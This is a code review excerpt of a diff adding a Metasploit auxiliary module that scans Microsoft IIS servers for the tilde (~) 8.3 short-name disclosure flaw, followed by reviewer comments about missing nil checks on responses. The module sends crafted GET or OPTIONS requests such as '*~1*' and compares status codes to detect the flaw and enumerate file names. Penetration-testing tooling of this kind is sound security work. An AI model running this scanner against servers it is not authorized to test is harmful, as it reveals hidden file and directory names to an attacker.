modules/auxiliary/scanner/http/iis_shortname_scanner.rb

```diff
@@ -0,0 +1,260 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Rex::Proto::Http
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Microsoft IIS shortname vulnerability scanner',
+        'Description' => %q{
+         The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which
+         could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili
+         and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in
+         2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+        },
+        'Author'         =>
+          [
+          'Soroush Dalili', # Vulnerability discovery
+          'Ali Abbasnejad', # Vulnerability discovery
+          'MinatoTW <shaks19jais[at]gmail.com>', # Metasploit module
+          'egre55 <ianaustin[at]protonmail.com>' # Metasploit module
+          ],
+        'License'     => MSF_LICENSE,
+        'References'     =>
+          [
+            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/' ]
+          ],
+        'Targets' => [[ 'Automatic', {} ]]
+      )
+    )
+
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('PATH', [ true, "The base path to start scanning from", "/" ]),
+      OptInt.new('Threads',[ true, "Number of threads to use", 20])
+
+    ])
+    @dirs = []
+    @files = []
+    @threads = []
+    @queue = Queue.new
+    @queue_ext = Queue.new
+    @alpha = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()-@^_`{}'
+    @charset_names = []
+    @charset_extensions = []
+    @charset_duplicates = []
+    @verb = ""
+    @name_size= 6
+  end
+
+  def check
+    is_vul ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+  rescue Rex::ConnectionError
+    print_bad("Failed to connect to target")
+  end
+
+  def is_vul
+    for method in ['GET', 'OPTIONS']
+      # Check for existing file
+      res1 = send_request_cgi({
+        'uri' => normalize_uri(datastore['PATH'], '*~1*'),
+        'method' => method
+      })
+
+      # Check for non-existing file
+      res2 = send_request_cgi({
+        'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'),
+        'method' => method
+      })
+
+      if res1.code == 404 && res2.code != 404
+        @verb = method
+        return true
+      end
+    end
+    return false
+  rescue Rex::ConnectionError
+    print_bad("Failed to connect to target")
+  end
+
+  def get_status(f , digit , match)
+    # Get response code for a file/folder
+    res2 = send_request_cgi({
+      'uri' => normalize_uri(datastore['PATH'],"#{f}#{match}~#{digit}#{match}"),
+      'method' => @verb
+    })
+    return res2.code
```

Comment:
You may want to make a check here, as `send_request_cgi` could potentially return `nil` and raise an exception when you try to access the response code. I'd suggest the same for the response in `get_incomplete_status` and `get_complete_status`.

Reply:
`send_request_cgi` can return `nil`.

There should be some error handing here.